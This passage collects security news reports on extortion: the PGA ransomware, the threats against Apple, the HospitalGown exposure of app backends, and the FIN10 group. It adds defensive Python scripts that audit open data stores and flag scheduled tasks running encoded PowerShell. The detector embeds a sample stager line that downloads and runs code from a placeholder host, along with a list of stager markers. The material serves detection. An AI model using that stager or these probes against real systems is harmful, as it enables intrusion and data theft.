cryptocurrency for their return. Officials discovered on Tuesday that servers had been targeted in a ransomware attack that blocked them from accessing material relating to major golf tournaments, including this week's PGA Championship at Bellerive Country Club. Some signage had been in development for over a year and could not be reproduced quickly, Golfweek reported. The extortion threat was clear: transfer bitcoin to the hackers or lose the files forever. "Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorythm (sic)," the ransom note read. "Backups were either encrypted or deleted or backup disks were formatted." The note claimed that shutting down the system might damage files. It included a bitcoin wallet address, where funds could be sent, and a warning that there was no way to access the files without a decryption key. The hackers said they would prove their "honest intentions" to the PGA of America by unlocking two files free of charge. A source who asked not to be named told Golfweek that officials had no intention of paying the ransom demand, following the advice of most law enforcement officials and cybersecurity experts. The network remained locked on Wednesday and external researchers are still investigating. PGA of America has declined to comment. The golfing association did not reveal which ransomware infected its computers, but the tech website Bleeping Computer found that the demand matched the BitPaymer variant. Researcher Lawrence Abrams said one previous extortion scheme asked for 53 bitcoins, equivalent to $335,000. Abrams described BitPaymer as a "secure ransomware", meaning there is no known weakness in its encryption that would allow free recovery, and said the PGA would have to either rely on backups to regain access to its files or pay the significant bitcoin demand.
A group of hackers is allegedly threatening to remotely wipe millions of iPhones and iCloud accounts unless Apple agrees to pay a ransom by April 7th. As Motherboard reports, the hackers, who call themselves the "Turkish Crime Family", are demanding that Apple pay a ransom of $75,000 (in either the Bitcoin or Ethereum cryptocurrencies) or hand over $100,000 worth of iTunes gift cards. Motherboard's Joseph Cox reports that one of the hackers shared screenshots of emails allegedly exchanged with Apple, including one in which a member of Apple's security team asked whether the group would be willing to share a sample of the stolen data. If the emails shared by the hackers are legitimate, it appears that Apple's security team also requested the removal of a YouTube video showing an unnamed member of the gang using stolen credentials to access an elderly woman's iCloud account and view photos that had previously been backed up online. The alleged emails from Apple go on to underline that the technology firm will "not reward cyber criminals for breaking the law". What we don't know is whether the email exchanges between the hackers and Apple are real or faked, and, indeed, whether the so-called "Turkish Crime Family" really has access to a large number of Apple users' credentials. Other than the video of the elderly woman's iCloud account being broken into, no evidence has been shared with the media to suggest that the hackers' claims of having obtained a large database of Apple usernames and passwords are legitimate. However, if it is true that the hackers are engaging with the media in an attempt to increase their chances of a substantial payout, that would be in line with an increasingly common technique used by extortionists.
For instance, we have discussed before how an individual hacker or hacking group known as The Dark Overlord has targeted investment banks, stealing internal documents and bringing them to the public's attention in an attempt to extort more money. In another extortion attempt, The Dark Overlord stole hundreds of gigabytes of files from the Gorilla Glue adhesive company and attempted to increase its chances of crowbarring more money out of corporate victims by sharing details with the security industry media. For the record, when The Dark Overlord contacted me to help them blackmail companies, I declined. I believe that companies should do everything in their power to protect their customers and prevent criminals from profiting from extortion. We simply don't know the truth of the Turkish Crime Family's claims, and whether Apple users are at risk. But I do hope that the media stories will help remind Apple users of the importance of using a strong, unique password to secure their account and enabling two-factor authentication to make their accounts harder to break into.
Insecure backend databases and mobile apps are making for a dangerous combination, exposing an estimated 280 million records that include a trove of private user data. According to a report by Appthority, more than 1,000 of the mobile apps it examined leaked personally identifiable information, including passwords, location data, VPN PINs, email addresses and phone numbers. The Appthority Mobile Threat Team named the vulnerability HospitalGown and said the culprit is misconfigured backend storage platforms, including Elasticsearch, Redis, MongoDB and MySQL. "HospitalGown is a vulnerability to data exposure caused, not by any code in the app, but by the app developers' failure to properly secure the backend servers with which the app communicates," wrote the authors of the report, released Wednesday. According to Seth Hardy, director of security research, the problem is a byproduct of the insecure database installations that made headlines in February, when misconfigured and unauthenticated MongoDB, Hadoop and CouchDB installations became popular extortion targets for hackers scanning for vulnerable servers. The weak link in the chain with HospitalGown is the insecure servers that apps connect to, Hardy said. During its investigation, Appthority found 21,000 open Elasticsearch servers exposing more than 43 terabytes of data. In one scenario, the attacker looks for weaknesses in the gap between the vendor's mobile application and the app's server-side components, according to researchers.
"The servers for most mobile applications are cloud based and accessible via the Internet. This allows a bad actor to skip the long and potentially many-layered 'compromise' stage of an attack, accessing company data directly from a database that is impossible for the enterprise to see or secure," they wrote. The vulnerable mobile apps the researchers found ran the gamut from office productivity, enterprise access management, games and dating to travel, flight and hotel applications. Any personally identifiable data a user shared with such an app was vulnerable to exfiltration by an attacker. "These servers were accessible from the Internet, lacked any means of authentication to prevent unwanted access to the data they contained, and failed to secure transport of data, including PII, using HTTPS conventions," according to the report. While this is strictly a data-exposure issue, Appthority said, attacks can quickly escalate: exposed personal information can easily be leveraged in a spear-phishing or brute-force attack. In its report, Appthority showed how Pulse Workspace, a mobile VPN app used by enterprises, government agencies and service providers, leaked data. While Pulse Workspace created an API to secure front-end Elasticsearch access, the backend, and all of the app's data records, were exposed, leaking Pulse customer data. Appthority notified Pulse Workspace and its customers of the vulnerability, which has since been fixed.
Appthority is careful to point out that each of the platforms it examined (Elasticsearch, Redis, MongoDB and MySQL) has plugins or built-in features that allow it to be exposed on the Internet properly. "Best practices on secure data stores is just not being adopted in too many cases," Hardy said. Elasticsearch, for example, has a bevy of security and data protection capabilities, such as the ability to encrypt all the data on the platform. Increasing the risk of HospitalGown-type attacks is the fact that many of the apps Appthority looked at seemed benign in terms of the user data they shared. But, increasingly, apps include advertising components that collect personally identifiable data that can be mined by attackers for phishing or ransomware campaigns. App developers and system administrators need to know where their data is stored and make sure it is secured, Hardy told Threatpost.
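The pattern Appthority describes, a data store reachable from the Internet that answers without credentials and without TLS, is straightforward to check for in your own estate before someone else does. The Python below is an added example, not Appthority's tooling: it probes an Elasticsearch endpoint with two unauthenticated GETs and a Redis endpoint with a raw INFO command, and classifies the replies. The embedded Elasticsearch and Redis replies are constructed samples, and the host name in the docstring is a placeholder.

```python
"""Check backend data stores for the HospitalGown pattern: reachable from the
Internet, answering without credentials, and (for HTTP services) without TLS.
Added example, not Appthority's tooling; sample replies below are constructed."""
import json
import socket
import urllib.error
import urllib.request
from urllib.parse import urlparse


def fetch(url, timeout=5):
    """GET url with no credentials; return (status, body). Network helper only."""
    req = urllib.request.Request(url, headers={"User-Agent": "backend-audit/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify_elasticsearch(scheme, root_status, root_body, idx_status, idx_body):
    """Classify an Elasticsearch endpoint from the raw replies to GET / and
    GET /_cat/indices?format=json, both sent without credentials."""
    result = {"exposure": "not-elasticsearch",
              "plaintext": scheme.lower() == "http", "indices": []}
    if root_status in (401, 403):          # a security plugin is enforcing auth
        result["exposure"] = "auth-required"
        return result
    if root_status != 200:
        return result
    try:
        root = json.loads(root_body)
    except ValueError:                     # e.g. an HTML page from a proxy
        return result
    # A cluster answers GET / with cluster_name and a version block; anything
    # else is some other service listening on the port.
    if not isinstance(root, dict) or "cluster_name" not in root or "version" not in root:
        return result
    # Cluster metadata handed out without a password is already an exposure.
    result["exposure"] = "open"
    result["cluster_name"] = root["cluster_name"]
    result["version"] = root["version"].get("number") if isinstance(root["version"], dict) else None
    if idx_status == 200:
        try:
            result["indices"] = sorted(row["index"] for row in json.loads(idx_body))
        except (ValueError, KeyError, TypeError):
            pass
    return result


def audit_elasticsearch(base_url, timeout=5):
    """Probe a live endpoint such as http://es.example.internal:9200 (placeholder)."""
    base = base_url.rstrip("/")
    root_status, root_body = fetch(base + "/", timeout)
    idx_status, idx_body = fetch(base + "/_cat/indices?format=json", timeout)
    return classify_elasticsearch(urlparse(base_url).scheme, root_status, root_body,
                                  idx_status, idx_body)


def classify_redis(reply):
    """Classify a Redis server from its raw reply to INFO: a bulk string ('$')
    means it answered without auth, -NOAUTH means requirepass is set, and
    -DENIED means protected mode refused a non-loopback client."""
    if reply.startswith(b"$"):
        return "open"
    if reply.startswith(b"-NOAUTH"):
        return "auth-required"
    if reply.startswith(b"-DENIED"):
        return "protected-mode"
    return "unknown"


def audit_redis(host, port=6379, timeout=5):
    """Send INFO over a raw socket and classify the reply (network helper)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"INFO\r\n")
        return classify_redis(sock.recv(4096))


# Constructed sample replies (not captured from any real server; Redis body truncated).
SAMPLE_ES_ROOT = json.dumps({"name": "node-1", "cluster_name": "prod-api",
                             "version": {"number": "5.4.0"}, "tagline": "You Know, for Search"})
SAMPLE_ES_INDICES = json.dumps([{"index": "users", "docs.count": "120345"},
                                {"index": "sessions", "docs.count": "98"}])
SAMPLE_REDIS_OPEN = b"$2874\r\n# Server\r\nredis_version:3.2.8\r\n"
SAMPLE_REDIS_AUTH = b"-NOAUTH Authentication required.\r\n"


def sample_findings():
    """Run the classifiers over the constructed samples; needs no network."""
    return {
        "es_open": classify_elasticsearch("http", 200, SAMPLE_ES_ROOT, 200, SAMPLE_ES_INDICES),
        "es_auth": classify_elasticsearch("https", 401, '{"error":"unauthorized"}', 401, ""),
        "es_other": classify_elasticsearch("http", 200, "<html>nginx</html>", 404, ""),
        "redis_open": classify_redis(SAMPLE_REDIS_OPEN),
        "redis_auth": classify_redis(SAMPLE_REDIS_AUTH),
    }


if __name__ == "__main__":
    for name, finding in sample_findings().items():
        print(name, finding)
```

Run `audit_elasticsearch("http://host:9200")` or `audit_redis("host")` against your own inventory from outside the trust boundary; an "open" verdict combined with `plaintext: True` is exactly the condition the report describes. The classifiers are kept separate from the network helpers so the decision logic can be unit-tested on captured replies.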
A group of financially motivated hackers is targeting the networks and systems of North American companies, threatening to leak stolen information and cripple the company by disrupting its networks if it doesn't pay a hefty ransom. The group, dubbed FIN10 by FireEye researchers, first gets access to target companies' systems through spear-phishing (and possibly other means), then uses publicly available software, scripts and techniques to gain a foothold in victims' networks. They use Meterpreter or the SplinterRAT to establish the initial foothold in victim environments (and later a permanent backdoor), then custom PowerShell-based utilities, the pen-testing tool PowerShell Empire and scheduled tasks to achieve persistence. "We have also observed FIN10 using PowerShell to load Metasploit Meterpreter stagers into memory," the researchers noted. The group leverages Windows Remote Desktop Protocol (RDP) and single-factor VPN access to reach various systems within the environment. Finally, they deploy destructive batch scripts intended to delete critical system files and shut down network systems in order to disrupt normal operations. "In all but one targeted intrusion we have attributed to FIN10, the attacker(s) demanded a variable sum payable in Bitcoin for the non-release of sensitive data obtained during network reconnaissance stages," the researchers say. The requested sum varies between 100 and 500 bitcoin. If the ransom isn't paid, they publish the stolen data on Pastebin-type sites. The researchers do not say whether any of the companies refused to pay and ended up having their systems and networks disrupted. For the time being, the group seems to have concentrated on hitting companies in North America, predominantly in Canada, and on two types of business: mining companies and casinos.
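One concrete detection for the persistence step described above (a scheduled task that launches an in-memory PowerShell stager) is to parse the TaskContent XML that Windows Security event 4698, "A scheduled task was created", records for each new task. The Python below is an added example, not FireEye's detection content. The task XML, the encoded payload and the 203.0.113.10 address are constructed for illustration, and the stager markers and switch list are common Empire/Meterpreter conventions to tune for your environment, not indicators from the FIN10 report.

```python
"""Flag scheduled tasks whose action launches an encoded PowerShell command,
the persistence pattern described for FIN10 (scheduled task + in-memory stager).
Parses the TaskContent XML carried by Windows Security event 4698.
Added example, not FireEye's detection content; the task XML, payload and
203.0.113.10 address are constructed for illustration."""
import base64
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Switches that hide the console or skip profile loading; common in stagers.
EVASION_SWITCHES = re.compile(
    r"(?i)(?<![\w-])-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|sta)\b")
# -EncodedCommand and the abbreviations PowerShell accepts, followed by Base64.
ENCODED_FLAG = re.compile(r"(?i)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
# Strings typical of download-and-execute or reflective-loading stagers
# (assumed conventions to tune per environment, not indicators from the report).
STAGER_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
                  "[Reflection.Assembly]::Load", "VirtualAlloc", "FromBase64String")
POWERSHELL_BIN = re.compile(r"(?i)(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$")


def parse_task_actions(task_xml):
    """Return [(command, arguments), ...] for every <Exec> action in a Task
    Scheduler XML document (the TaskContent field of event 4698)."""
    # The stored XML declares encoding="UTF-16" even though the event API hands
    # us text; expat rejects that on str input, so drop the declaration.
    task_xml = re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml)
    root = ET.fromstring(task_xml)
    actions = []
    for exec_el in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        cmd = exec_el.findtext("t:Command", default="", namespaces=TASK_NS)
        args = exec_el.findtext("t:Arguments", default="", namespaces=TASK_NS)
        actions.append((cmd.strip().strip('"'), args.strip()))
    return actions


def decode_encoded_command(arguments):
    """Decode a -EncodedCommand payload (Base64 of UTF-16LE) if one is present."""
    m = ENCODED_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_task(task_xml):
    """Score each action of one task: 'suspicious', 'review' or 'benign'."""
    findings = []
    for cmd, args in parse_task_actions(task_xml):
        is_ps = POWERSHELL_BIN.search(cmd) is not None
        decoded = decode_encoded_command(args) if is_ps else None
        # Scan the decoded script when there is one, otherwise the raw arguments;
        # never scan the Base64 blob itself, which yields chance substring hits.
        scan = (decoded if decoded is not None else args).lower()
        markers = [mk for mk in STAGER_MARKERS if mk.lower() in scan]
        evasion = sorted({m.group(0).lower() for m in EVASION_SWITCHES.finditer(args)})
        if markers or (decoded is not None and evasion):
            verdict = "suspicious"
        elif decoded is not None or evasion:
            verdict = "review"
        else:
            verdict = "benign"
        findings.append({"command": cmd, "verdict": verdict, "decoded": decoded,
                         "markers": markers, "evasion_switches": evasion})
    return findings


# Constructed samples (not real event data).
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SUSPICIOUS_TASK = f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoP -NonI -W Hidden -Enc {SAMPLE_B64}</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\cmd.exe</Command>
    <Arguments>/c C:\\ops\\nightly-backup.bat</Arguments>
  </Exec></Actions>
</Task>"""


def sample_findings():
    """Analyze the two constructed tasks; needs no Windows host."""
    return {"suspicious": analyze_task(SUSPICIOUS_TASK), "benign": analyze_task(BENIGN_TASK)}


if __name__ == "__main__":
    for name, findings in sample_findings().items():
        for f in findings:
            print(name, f["verdict"], f["markers"], f["evasion_switches"])
```

Feed `analyze_task` the TaskContent string of each 4698 event from your log pipeline (or the exported task XML from `schtasks /query /xml` during an investigation); a "review" verdict, encoded PowerShell with no recognised markers, still deserves a look, since custom utilities like the ones attributed to FIN10 will not match a marker list.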
Still, it's possible that they've targeted companies in other industries, or will do so in the future. FIN10 sends the extortion emails to staff and board members of the victim organizations, and is also known to contact bloggers and local journalists to inform them about the breach, likely in an attempt to pressure affected organizations into paying the ransom. Finally, even though they sign their emails with monikers used by Russian and Serbian hackers ("Angels_Of_Truth," "Tesla Team," "Anonymous Threat Agent"), the quality of the group's English, the low quality of their Russian, and inconsistencies in tradecraft all point away from those particular individuals or groups. "Emphasis in regional targeting of North American-based organizations could possibly suggest the attacker(s) familiarity with the region," the researchers noted. They also point out that the "relative degree of operational success enjoyed by FIN10 makes it highly probable the group will continue to conduct similar extortion-based campaigns at least in the near term." Companies that have received a similar ransom demand are advised to move fast to confirm that the breach has actually happened, determine its scope, contain the attack, evict the attackers from their networks and make sure they can't come back. Those last two steps are, perhaps, better done after the company has definitely decided that it is ready to deal with the consequences of the attackers' anger. Calling in law enforcement and legal counsel for advice on what to do is also a good idea. "Understand that paying the ransom may be the right option, but there are no guarantees the attacker(s) won't come back for more money or simply leak the data anyway. Include experts in the decision-making process and understand the risks associated with all options," the researchers advise.
Companies that have yet to be targeted by these or other hackers would do well to improve their security posture, but also to prepare for data breaches by tightening access to their backup environment and knowing exactly who will be called in to help in case of a breach.
FireEye has identified a set of financially motivated intrusion operations carried out by a threat actor we have dubbed FIN10. FIN10 is known for compromising networks, stealing sensitive data, and directly engaging victim executives and board members in an attempt to extort them into paying between 100 and 500 bitcoins (valued at between $125,000 and $620,000 as of mid-April 2017). For some victims that did not give in to the demand, FIN10 escalated the operation, destroyed critical production systems and leaked stolen data to journalists in an attempt to increase the visibility of the compromise and coerce victims into paying up. The first known FIN10 operation was in 2013 and their operations have continued until at least 2016. To date, we are primarily aware of Canadian victims, specifically casinos and mining organizations. Given the release of sensitive victim data, extortion, and destruction of systems, FireEye considers FIN10 to be one of the most disruptive threat actors observed in the region so far.